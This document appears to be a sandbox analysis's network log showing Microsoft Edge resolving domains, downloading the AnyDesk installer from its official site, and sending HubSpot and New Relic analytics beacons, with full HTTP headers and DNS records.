
IN A

104.16.117.116

metrics-fe-na1.hubspot.com

IN A

104.16.118.116
DNS

metrics-fe-na1.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

metrics-fe-na1.hubspot.com

IN A

Response

metrics-fe-na1.hubspot.com

IN A

104.16.117.116

metrics-fe-na1.hubspot.com

IN A

104.16.118.116
DNS

download.anydesk.com

msedge.exe

Remote address:

8.8.8.8:53

Request

download.anydesk.com

IN A

Response

download.anydesk.com

IN A

159.69.19.197
GET

https://download.anydesk.com/AnyDesk.exe

msedge.exe

Remote address:

159.69.19.197:443

Request

GET /AnyDesk.exe HTTP/2.0
host: download.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true

Response

HTTP/2.0 200

server: nginx
date: Sat, 05 Oct 2024 16:07:59 GMT
content-type: application/octet-stream
content-length: 4993864
last-modified: Wed, 18 Sep 2024 14:11:36 GMT
etag: "66eadf98-4c3348"
expires: Sat, 05 Oct 2024 16:07:58 GMT
cache-control: no-cache
accept-ranges: bytes
GET

https://download.anydesk.com/AnyDesk.exe

msedge.exe

Remote address:

159.69.19.197:443

Request

GET /AnyDesk.exe HTTP/2.0
host: download.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.3.1728144483689

Response

HTTP/2.0 200

server: nginx
date: Sat, 05 Oct 2024 16:08:28 GMT
content-type: application/octet-stream
content-length: 4993864
last-modified: Wed, 18 Sep 2024 14:11:36 GMT
etag: "66eadf98-4c3348"
expires: Sat, 05 Oct 2024 16:08:27 GMT
cache-control: no-cache
accept-ranges: bytes
GET

https://download.anydesk.com/AnyDesk.exe

msedge.exe

Remote address:

159.69.19.197:443

Request

GET /AnyDesk.exe HTTP/2.0
host: download.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.4.1728144483689
if-none-match: "66eadf98-4c3348"
if-modified-since: Wed, 18 Sep 2024 14:11:36 GMT

Response

HTTP/2.0 304

server: nginx
date: Sat, 05 Oct 2024 16:08:45 GMT
last-modified: Wed, 18 Sep 2024 14:11:36 GMT
etag: "66eadf98-4c3348"
expires: Sat, 05 Oct 2024 16:08:44 GMT
cache-control: no-cache
DNS

10.179.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.179.89.13.in-addr.arpa

IN PTR

Response
DNS

10.179.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.179.89.13.in-addr.arpa

IN PTR

Response
DNS

197.19.69.159.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.19.69.159.in-addr.arpa

IN PTR

Response

197.19.69.159.in-addr.arpa

IN PTR

static1971969159clientsyour-serverde
DNS

197.19.69.159.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.19.69.159.in-addr.arpa

IN PTR

Response

197.19.69.159.in-addr.arpa

IN PTR

static1971969159clientsyour-serverde
DNS

js-agent.newrelic.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js-agent.newrelic.com

IN A

Response

js-agent.newrelic.com

IN A

162.247.243.39
DNS

js-agent.newrelic.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js-agent.newrelic.com

IN A

Response

js-agent.newrelic.com

IN A

162.247.243.39
GET

https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

msedge.exe

Remote address:

104.18.80.204:443

Request

GET /embed/v3/counters.gif?key=config-loaded-failure&value=1 HTTP/1.1
Host: perf-na1.hsforms.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://anydesk.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: __cf_bm=qxDA273XjP9hQVVfnye4AR93CjGzNsiFDXgAeUMQ7lw-1728144471-1.0.1.1-WuSBd2JnhfFpN_GqWbfkCVV7r7Wy7CwrvIREJcm1Y_bYAHfysanIK6YsQ4iYpnrEUQOcIJff0jAhsOLN9dSwGQ

Response

HTTP/1.1 403 Forbidden

Date: Sat, 05 Oct 2024 16:08:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Sat, 05 Oct 2024 16:08:26 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8cdeab3f7f146687-AMS
Content-Encoding: br
GET

https://js-agent.newrelic.com/nr-spa-1216.min.js

msedge.exe

Remote address:

162.247.243.39:443

Request

GET /nr-spa-1216.min.js HTTP/2.0
host: js-agent.newrelic.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Wed, 18 Oct 2023 21:31:16 GMT
etag: "63e2df852d15ab21d7ff8fc4363222e8"
cache-control: public, max-age=31536000, stale-while-revalidate=86400, stale-if-error=86400
content-type: application/javascript
access-control-allow-origin: *
content-encoding: br
accept-ranges: bytes
date: Sat, 05 Oct 2024 16:08:11 GMT
x-served-by: cache-ams21037-AMS
x-cache: HIT
x-cache-hits: 66122
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
strict-transport-security: max-age=300
content-length: 19141
DNS

39.243.247.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

39.243.247.162.in-addr.arpa

IN PTR

Response
DNS

bam-cell.nr-data.net

msedge.exe

Remote address:

8.8.8.8:53

Request

bam-cell.nr-data.net

IN A

Response

bam-cell.nr-data.net

IN CNAME

bam-cell.cell.nr-data.net

bam-cell.cell.nr-data.net

IN CNAME

fastly-tls12-bam-cell.nr-data.net

fastly-tls12-bam-cell.nr-data.net

IN A

162.247.243.30
DNS

bam-cell.nr-data.net

msedge.exe

Remote address:

8.8.8.8:53

Request

bam-cell.nr-data.net

IN A

Response

bam-cell.nr-data.net

IN CNAME

bam-cell.cell.nr-data.net

bam-cell.cell.nr-data.net

IN CNAME

fastly-tls12-bam-cell.nr-data.net

fastly-tls12-bam-cell.nr-data.net

IN A

162.247.243.30
GET

https://bam-cell.nr-data.net/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=3484&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456&be=1151&fe=1340&dc=1306&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728144488518,%22n%22:0,%22f%22:-1,%22dn%22:-1,%22dne%22:-1,%22c%22:-1,%22ce%22:-1,%22rq%22:7,%22rp%22:1025,%22rpe%22:1115,%22dl%22:1039,%22di%22:1306,%22ds%22:1306,%22de%22:1307,%22dc%22:1339,%22l%22:1339,%22le%22:1340%7D,%22navigation%22:%7B%7D%7D&fp=1473&fcp=1473&ja=%7B%22nrSnippetVersion%22:%221216%22,%22environment%22:%22prod%22,%22deployed%22:true,%22hublet%22:%22na1%22,%22hsOlderBrowserVersion%22:true,%22conditionalPolyfillsInstalled%22:false,%22portalId%22:7940397,%22package%22:%22conversations-visitor-ui%22,%22packageVersion%22:%221.20626%22,%22template%22:%22visitor-index.html.tsx%22,%22user-online%22:true,%22visibility%22:%22visible%22,%22currentVisibility%22:%22visible%22,%22reactRhumbVersion%22:%221.11409%22,%22reaganVersion%22:%22react-rhumb%22,%22route%22:%22/%22,%22numReaganChecksStarted%22:1,%22numPreviousReaganChecksAborted%22:0,%22avgDurationBeforePreviousReaganAborts%22:0,%22numPreviousReaganChecksFailed%22:0,%22numPreviousReaganChecksSuccessful%22:0%7D&jsonp=NREUM.setToken

msedge.exe

Remote address:

162.247.243.30:443

Request

GET /1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=3484&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456&be=1151&fe=1340&dc=1306&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728144488518,%22n%22:0,%22f%22:-1,%22dn%22:-1,%22dne%22:-1,%22c%22:-1,%22ce%22:-1,%22rq%22:7,%22rp%22:1025,%22rpe%22:1115,%22dl%22:1039,%22di%22:1306,%22ds%22:1306,%22de%22:1307,%22dc%22:1339,%22l%22:1339,%22le%22:1340%7D,%22navigation%22:%7B%7D%7D&fp=1473&fcp=1473&ja=%7B%22nrSnippetVersion%22:%221216%22,%22environment%22:%22prod%22,%22deployed%22:true,%22hublet%22:%22na1%22,%22hsOlderBrowserVersion%22:true,%22conditionalPolyfillsInstalled%22:false,%22portalId%22:7940397,%22package%22:%22conversations-visitor-ui%22,%22packageVersion%22:%221.20626%22,%22template%22:%22visitor-index.html.tsx%22,%22user-online%22:true,%22visibility%22:%22visible%22,%22currentVisibility%22:%22visible%22,%22reactRhumbVersion%22:%221.11409%22,%22reaganVersion%22:%22react-rhumb%22,%22route%22:%22/%22,%22numReaganChecksStarted%22:1,%22numPreviousReaganChecksAborted%22:0,%22avgDurationBeforePreviousReaganAborts%22:0,%22numPreviousReaganChecksFailed%22:0,%22numPreviousReaganChecksSuccessful%22:0%7D&jsonp=NREUM.setToken HTTP/1.1
Host: bam-cell.nr-data.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://app.hubspot.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200

Connection: keep-alive
Content-Length: 79
date: Sat, 05 Oct 2024 16:08:14 GMT
content-type: text/javascript
cross-origin-resource-policy: cross-origin
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: *
access-control-expose-headers: Date
timing-allow-origin: *
set-cookie: JSESSIONID=912571ef7c5bdec1; Path=/; Domain=.nr-data.net; Secure; SameSite=None
x-served-by: cache-ams2100132-AMS
POST

https://bam-cell.nr-data.net/ins/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5171&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456

msedge.exe

Remote address:

162.247.243.30:443

Request

POST /ins/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5171&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456 HTTP/1.1
Host: bam-cell.nr-data.net
Connection: keep-alive
Content-Length: 1864
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain
Accept: */*
Origin: https://app.hubspot.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.hubspot.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=912571ef7c5bdec1

Response

HTTP/1.1 204

Connection: keep-alive
date: Sat, 05 Oct 2024 16:08:14 GMT
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
access-control-allow-credentials: true
x-served-by: cache-ams2100132-AMS
POST

https://bam-cell.nr-data.net/events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5176&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456

msedge.exe

Remote address:

162.247.243.30:443

Request

POST /events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5176&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456 HTTP/1.1
Host: bam-cell.nr-data.net
Connection: keep-alive
Content-Length: 836
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain
Accept: */*
Origin: https://app.hubspot.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.hubspot.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=912571ef7c5bdec1
DNS

30.243.247.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

30.243.247.162.in-addr.arpa

IN PTR

Response
DNS

30.243.247.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

30.243.247.162.in-addr.arpa

IN PTR

Response
POST

https://bam-cell.nr-data.net/events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5945&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456

msedge.exe

Remote address:

162.247.243.30:443

Request

POST /events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5945&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456 HTTP/1.1
Host: bam-cell.nr-data.net
Connection: keep-alive
Content-Length: 1254
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://app.hubspot.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://app.hubspot.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=912571ef7c5bdec1

Response

HTTP/1.1 200

Connection: keep-alive
Content-Length: 24
date: Sat, 05 Oct 2024 16:08:15 GMT
content-type: image/gif
cross-origin-resource-policy: cross-origin
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://app.hubspot.com
x-served-by: cache-ams21023-AMS
POST

https://bam-cell.nr-data.net/jserrors/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5946&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456

msedge.exe

Remote address:

162.247.243.30:443

Request

POST /jserrors/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5946&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456 HTTP/1.1
Host: bam-cell.nr-data.net
Connection: keep-alive
Content-Length: 1400
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://app.hubspot.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://app.hubspot.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=912571ef7c5bdec1

Response

HTTP/1.1 200

Connection: keep-alive
Content-Length: 24
date: Sat, 05 Oct 2024 16:08:16 GMT
content-type: image/gif
cross-origin-resource-policy: cross-origin
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://app.hubspot.com
x-served-by: cache-ams2100087-AMS
POST

https://bam-cell.nr-data.net/events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=986&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0

msedge.exe

Remote address:

162.247.243.30:443

Request

POST /events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=986&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0 HTTP/1.1
Host: bam-cell.nr-data.net
Connection: keep-alive
Content-Length: 790
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://app.hubspot.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://app.hubspot.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=912571ef7c5bdec1

Response

HTTP/1.1 200

Connection: close
Content-Length: 24
date: Sat, 05 Oct 2024 16:08:17 GMT
content-type: image/gif
cross-origin-resource-policy: cross-origin
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://app.hubspot.com
x-served-by: cache-ams21024-AMS
POST

https://bam-cell.nr-data.net/events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5948&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456

msedge.exe

Remote address:

162.247.243.30:443

Request

POST /events/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=5948&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456 HTTP/1.1
Host: bam-cell.nr-data.net
Connection: keep-alive
Content-Length: 1105
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://app.hubspot.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://app.hubspot.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=912571ef7c5bdec1

Response

HTTP/1.1 200

Connection: keep-alive
Content-Length: 24
date: Sat, 05 Oct 2024 16:08:16 GMT
content-type: image/gif
cross-origin-resource-policy: cross-origin
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://app.hubspot.com
x-served-by: cache-ams2100114-AMS
GET

https://bam-cell.nr-data.net/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=755&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0&be=382&fe=515&dc=451&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728144496042,%22n%22:0,%22f%22:-1,%22dn%22:-1,%22dne%22:-1,%22c%22:-1,%22ce%22:-1,%22rq%22:6,%22rp%22:319,%22rpe%22:366,%22dl%22:319,%22di%22:451,%22ds%22:451,%22de%22:452,%22dc%22:514,%22l%22:515,%22le%22:515%7D,%22navigation%22:%7B%7D%7D&fp=534&fcp=534&ja=%7B%22nrSnippetVersion%22:%221216%22,%22environment%22:%22prod%22,%22deployed%22:true,%22hublet%22:%22na1%22,%22hsOlderBrowserVersion%22:true,%22conditionalPolyfillsInstalled%22:false,%22portalId%22:7940397,%22package%22:%22conversations-visitor-ui%22,%22packageVersion%22:%221.20626%22,%22template%22:%22visitor-index.html.tsx%22,%22user-online%22:true,%22visibility%22:%22visible%22,%22currentVisibility%22:%22visible%22,%22reactRhumbVersion%22:%221.11409%22,%22reaganVersion%22:%22react-rhumb%22,%22route%22:%22/%22,%22numReaganChecksStarted%22:1,%22numPreviousReaganChecksAborted%22:0,%22avgDurationBeforePreviousReaganAborts%22:0,%22numPreviousReaganChecksFailed%22:0,%22numPreviousReaganChecksSuccessful%22:0%7D&jsonp=NREUM.setToken

msedge.exe

Remote address:

162.247.243.30:443

Request

GET /1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=755&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0&be=382&fe=515&dc=451&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728144496042,%22n%22:0,%22f%22:-1,%22dn%22:-1,%22dne%22:-1,%22c%22:-1,%22ce%22:-1,%22rq%22:6,%22rp%22:319,%22rpe%22:366,%22dl%22:319,%22di%22:451,%22ds%22:451,%22de%22:452,%22dc%22:514,%22l%22:515,%22le%22:515%7D,%22navigation%22:%7B%7D%7D&fp=534&fcp=534&ja=%7B%22nrSnippetVersion%22:%221216%22,%22environment%22:%22prod%22,%22deployed%22:true,%22hublet%22:%22na1%22,%22hsOlderBrowserVersion%22:true,%22conditionalPolyfillsInstalled%22:false,%22portalId%22:7940397,%22package%22:%22conversations-visitor-ui%22,%22packageVersion%22:%221.20626%22,%22template%22:%22visitor-index.html.tsx%22,%22user-online%22:true,%22visibility%22:%22visible%22,%22currentVisibility%22:%22visible%22,%22reactRhumbVersion%22:%221.11409%22,%22reaganVersion%22:%22react-rhumb%22,%22route%22:%22/%22,%22numReaganChecksStarted%22:1,%22numPreviousReaganChecksAborted%22:0,%22avgDurationBeforePreviousReaganAborts%22:0,%22numPreviousReaganChecksFailed%22:0,%22numPreviousReaganChecksSuccessful%22:0%7D&jsonp=NREUM.setToken HTTP/1.1
Host: bam-cell.nr-data.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://app.hubspot.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=912571ef7c5bdec1
POST

https://bam-cell.nr-data.net/jserrors/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=988&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0

msedge.exe

Remote address:

162.247.243.30:443

Request

POST /jserrors/1/f9d051f404?a=205242107&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=988&ck=1&ref=https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0 HTTP/1.1
Host: bam-cell.nr-data.net
Connection: keep-alive
Content-Length: 327
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://app.hubspot.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://app.hubspot.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=912571ef7c5bdec1

Response

HTTP/1.1 200

Connection: close
Content-Length: 24
date: Sat, 05 Oct 2024 16:08:17 GMT
content-type: image/gif
cross-origin-resource-policy: cross-origin
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://app.hubspot.com
x-served-by: cache-ams2100108-AMS
GET

https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

msedge.exe

Remote address:

104.18.80.204:443

Request

GET /embed/v3/counters.gif?key=config-loaded-failure&value=1 HTTP/1.1
Host: perf-na1.hsforms.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://anydesk.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: __cf_bm=qxDA273XjP9hQVVfnye4AR93CjGzNsiFDXgAeUMQ7lw-1728144471-1.0.1.1-WuSBd2JnhfFpN_GqWbfkCVV7r7Wy7CwrvIREJcm1Y_bYAHfysanIK6YsQ4iYpnrEUQOcIJff0jAhsOLN9dSwGQ

Response

HTTP/1.1 403 Forbidden

Date: Sat, 05 Oct 2024 16:08:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Sat, 05 Oct 2024 16:08:31 GMT
Vary: Accept-Encoding
